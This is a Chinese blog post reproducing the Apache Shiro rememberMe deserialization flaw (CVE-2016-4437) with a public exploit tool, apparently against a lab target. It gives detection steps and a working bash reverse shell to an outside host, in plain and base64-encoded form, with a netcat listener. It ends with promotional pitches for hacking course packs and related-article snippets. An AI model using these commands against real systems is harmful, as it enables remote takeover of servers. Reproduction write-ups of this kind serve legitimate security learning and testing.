【漏洞复现】shiro 反序列化 (CVE-2016-4437)

最新推荐文章于 2024-05-19 13:41:05 发布
最新推荐文章于 2024-05-19 13:41:05 发布
阅读量256 收藏
点赞数
文章标签: web安全 网络安全 安全架构 数据库 密码学 系统安全 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61101264/article/details/132802044
版权

漏洞介绍

Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序

在Shiro <= 1.2.4中,反序列化过程中所用到的AES加密的key是硬编码在源码中,当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编码后存储在cookie的rememberMe字段中,服务端收到登录请求后,会对rememberMe的cookie值进行base64解码,接着进行AES解密,然后反序列化。由于AES加密是对称式加密(key既能加密数据也能解密数据),所以当攻击者知道了AES key后,就能够构造恶意的rememberMe cookie值从而触发反序列化漏洞

poc

使用burp抓取当前页面数据包,在cookie中添加rememberMe=1,在响应包中显示两个Set-Cookie: rememberMe=deleteMe,说明存在shiro框架可能存在漏洞
在这里插入图片描述

exp

我的vm虚拟机 kali IP: 192.168.100.131

我的花生壳 映射外网地址 103.46.128.21:49040-> 192.168.100.131:8888
在这里插入图片描述

使用Shiro_exploit进行漏洞利用

项目地址:https://github.com/insightglacier/Shiro_exploit

检测是否存在shiro漏洞

python .\shiro_exploit.py -u http://123.58.224.8:25050/

在这里插入图片描述

vulnerable:True表示存在shiro漏洞

在这里插入图片描述

反弹shell利用

  • kali 监听
nc -lnvp 8888

在这里插入图片描述

  • 执行利用脚本
python shiro_exploit.py -t 3 -u  http://123.58.224.8:25050/  -p "bash加密命令"
# bash命令
bash -i >& /dev/tcp/103.46.128.21/49040 0>&1
# bash加密后命令
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDMuNDYuMTI4LjIxLzQ5MDQwIDA+JjE=}|{base64,-d}|{bash,-i}
python shiro_exploit.py -t 3 -u   http://123.58.224.8:25050/  -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDMuNDYuMTI4LjIxLzQ5MDQwIDA+JjE=}|{base64,-d}|{bash,-i}"

在这里插入图片描述

成功反弹shell
在这里插入图片描述

使用一键利用工具复现

项目地址:https://github.com/j1anFen/shiro_attack/releases/tag/2.2

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

网络安全学习资源分享:

最后给大家分享我自己学习的一份全套的网络安全学习资料,希望对想学习 网络安全的小伙伴们有帮助!

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

【点击领取】CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。【点击领取视频教程】

在这里插入图片描述

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取技术文档】

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取书籍】

在这里插入图片描述

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

在这里插入图片描述

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

网络安全入门到进阶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shiro反序列化复现.zip
08-03
Apache Shiro在过去的版本中确实存在过这样的漏洞,例如CVE-2016-4437,攻击者可以利用此漏洞通过精心构造的序列化数据触发代码执行。 这个复现工具包可能包括以下内容: 1. **PoC(Proof of Concept)代码**:这...
【vulhub】shiro反序列化漏洞工具复现CVE-2016-4437
qq_45300786的博客
04-22 1099
详细过程可以看我的这篇文章 Apache Shiro Java反序列化漏洞 这次我就直接用工作来复现 工具地址https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/tag/v2.3 shiro的端口是8080 默认 然后等一会,解密 监听端口 然后反弹shell 反弹成功 参考文章 https://vlambda.com/wz_7iadhz3GfNo.html ...
详细shiro漏洞复现及利用方法(CVE-2016-4437
热门推荐
dreamthe的博客
04-26 2万+
该篇文章比较详细的介绍shiro漏洞利用,无论是shiro漏洞图形化工具利用,还是shiro漏洞结合JRMP我觉得比大多数文章都详细,如果你对网上结合JRMP反弹shell不是很明白,非常推荐来看看这篇文章。另外漏洞利用工程中用到的工具以及代码都上传到百度网盘,供大家使用,在文章最后哦。
shiro反序列化漏洞复现CVE-2016-4437
最新发布
m0_70349048的博客
05-19 424
cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理。,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,AES加密,Base64编码,然后将其作为cookie的Remember Me字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。将生成的payload复制到请求包cookie的位置, 发包。可以看到,已经能够远程执行任意命令了。
shiro CVE-2016-4437 漏洞复现
qq_40646572的博客
05-09 864
shiro550漏洞漏洞点就在于用户信息反序列化可利用,并且加密的key值给了一个固定的默认值的,导致很多开发人员直接使用,接着导致了洞的产生。
漏洞复现:CVE-2016-4437 Apache Shiro 反序列化
m_ing
06-28 1370
前言:从今天开始复现漏洞啦 我们首先要知道什么是反序列化漏洞呢? 在这里不做解释,建议大家查看反序列化漏洞原理 什么是Shiroshiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列化、AES加密、Base64编码操作。服务器端识别身份解密处理cookie的流程则是: (1)获取rememberMe cookie (2)base64
shiro反序列化漏洞详解与复现shiro-550/CVE-2016-4437
ccccai22的博客
08-28 199
shiro反序列化漏洞shiro-550/CVE-2016-4437
shiro-attack-4.7.0-SNAPSHOT-all.zip
10-24
同时,他们应该熟悉Java序列化的安全风险,比如CVE-2015-4852等著名漏洞,以及如何通过设置安全反序列化策略来防止这类攻击。 总的来说,这个工具包对于提升基于Apache Shiro构建的应用程序的安全性具有重要意义...
Apache-Shiro反序列化1
08-03
然而,在 Apache Shiro 中存在一个严重的反序列化漏洞CVE-2016-4437,攻击者可以利用该漏洞在服务器上执行恶意命令。 一、漏洞成因 Apache Shiro反序列化机制存在漏洞,该漏洞允许攻击者在服务器上执行恶意...
Attacking_Shiro_with_CVE_2020_2555
03-25
Attacking_Shiro_with_CVE_2020_2555前段时间项目上遇到了一个部署在Weblogic上的存在Shiro反序列化裂缝的Web应用,于是Y4er Y4er师傅的文章的文章调了下payload ,很遗憾当时并没有成功(可能是目标Weblogic打了...
Apache Shiro Padding Oracle漏洞可导致远程命令执行漏洞解决
01-09
背景:Apach Shiro官方披露其cookie持久化参数rememberMe加密算法存在漏洞,可被Padding Oracle攻击,攻击者利用Padding Oracle攻击手段可构造恶意的rememberMe值,绕过加密算法验证,执行java反序列化操作,最终可...
Apache shiro反序列化CVE-2016-4437复现
weixin_49848824的博客
07-09 840
一、原理分析Shiro提供了记住我(RememberMe)的功能,比如访问淘宝等网站时,关闭了浏览器下次再打开时还是能够记住上次访问过的用户,下次访问时无需再登录即可访问Shiro会对cookie中的Remember me字段进行相关处理:序列化-->AES加密-->base64编码由于Shiro本身含有一个预设的AES密钥Base64.decode("KPHblxk5D2deZilxcaaaA=="),每个人都能够通过源代码拿到该密钥,因此攻击者可以构造一个恶意的对象,对其进行序列化并用该密钥进行加密,b
vulhub靶场shiro系列漏洞复现CVE-2010-3863、CVE-2016-4437(shiro550)、CVE-2020-1957、shiro721
qq_58873970的博客
07-25 1174
以上shiro反序列化,权限绕过,shiro-721 代码执行也可以用上面工具检测到并利用工具下载地址shiro反序列化综合利用工具:https://github.com/j1anFen/shiro_attack/releasesshiro漏洞检测工具yakit:https://github.com/yaklang/yakit/tags。
CVE-2016-4437---Shiro反序列化漏洞
qq_44880255的博客
08-10 4025
1、影响版本 Apache Shiro <= 1.2.4 2、漏洞原因 Apache Shiro默认使用了CookieRememberMeManager。其处理cookie的流程是: 得到rememberMe的cookie值;Base64解码;AES解密;反序列化。 然而AES的密钥是硬编码的,即AES加解密的密钥是写死在代码中的,攻击者可以构造恶意数据造成反序列化漏洞。 3、漏洞复现 这里使用的环境是Kali中的vulhub和docker。 首先进入目录vulhub/shiro/CVE-2016
Apache Shiro 反序列化(CVE-2016-4437)复现
m0_48520508的博客
08-03 1608
0x01简介 这个漏洞属于java反序列化漏洞的一种,shiro是java的一个开发框架执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 官网漏洞说明:https://issues.apache.org/jira/browse/SHIRO-550 Apache Shiro框架提供了记住我(RememberMe)的功能,关闭浏览器再次访问时无需再登录即可访问。shiro默认使用CookieRemember
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437复现
yukinorong的博客
06-29 3234
基础知识 序列化和反序列化 反序列化漏洞原因 在Java反序列化中,会调用被反序列化的readObject方法,当readObject方法书写不当时就会引发漏洞反序列化的检测 基础库中隐藏的反序列化漏洞 优秀的Java开发人员一般会按照安全编程规范进行编程,很大程度上减少了反序列化漏洞的产生。并且一些成熟的Java框架比如Spring MVC、Struts2等,都有相应的防范反序列化的机制。如果仅仅是开发失误,可能很少会产生反序列化漏洞,即使产生,其绕过方法、利用方式也较为复杂。但
shiro反序列化漏洞复现及分析(CVE-2016-4437)
qq_67473072的博客
07-28 574
shiro反序列化漏洞复现及分析(CVE-2016-4437)
CVE-2016-4437
08-14
CVE-2016-4437是关于Apache Shiro的一个安全漏洞。这个漏洞允许攻击者在受影响的应用程序上执行远程代码执行攻击,进而获得系统访问权限。在此漏洞中,攻击者可以通过反序列化攻击利用Shiro的RememberMe功能,从而执行恶意代码。在早于1.2.4版本的Shiro中,默认使用的是一个固定的AES密钥,攻击者可以使用已知的密钥来反序列化执行恶意代码。 要利用这个漏洞,攻击者可以使用Python脚本或在线工具生成反弹shell的命令,然后将其执行在目标服务器上。这样,攻击者就能够执行任意命令并与攻击机建立一个反向连接。 需要注意的是,利用CVE-2016-4437漏洞进行攻击是非法的,并且可能导致严重的安全后果。为了防止此类漏洞的利用,建议及时更新Shiro版本,并采取其他安全措施,如限制网络访问和使用强密码保护系统。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )](https://blog.csdn.net/weixin_60329395/article/details/127399081)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值